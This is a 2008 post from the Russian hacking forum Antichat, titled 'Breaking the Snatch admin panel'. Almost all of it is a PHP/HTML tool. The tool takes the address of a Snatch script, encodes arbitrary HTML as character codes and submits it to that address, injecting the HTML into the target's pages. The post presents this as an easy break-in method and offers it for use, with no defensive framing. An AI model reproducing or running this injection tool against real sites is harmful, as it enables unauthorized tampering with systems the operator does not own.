Форум АНТИЧАТ - Ломаем админку Snatch

Ломаем админку Snatch

06.05.2008, 20:42

Don Anton

Участник форума

Регистрация: 28.02.2008

Сообщений: 120

Провел на форуме:
1704588

Репутация: 335

Ломаем админку Snatch

Довольно лёгкий способ взлома админки Snatch

PHP код:


		
			
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"

"http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

</head>

<body>

<?

If (!isset($_POST[adr]))

{

?>

<form action="" method="post" name="form2">

Адрес к файлу снетч htt://bla.bla/bla/bla.php <input name="adr" type="text" size="30">

<textarea name="data" cols="80" rows="20"></textarea>

<input name="go" type="submit" value="GOGOGO">

</form>

<?

}

else

{

$a=$_POST[adr];

echo "Атака на снетч по адресу ".$_POST[adr];

$data=$_POST["data"];

//echo "Входной набор символов: ".$data."<br>";

//echo "Результат: ";

$data2="";

for($i=0; $i<strlen($data); $i++){ $data2.= ord($data[$i]).",";}

?>

<form action="<? echo $a; ?>" method="post" name="form">

<br>Вставить HTML код в страницу:<br>

<textarea name="data" cols="80" rows="20"><? echo $data2; ?></textarea>

<input name="go" type="submit" value="GOGOGO">



</form>

<?

}

?>

</body>

</html>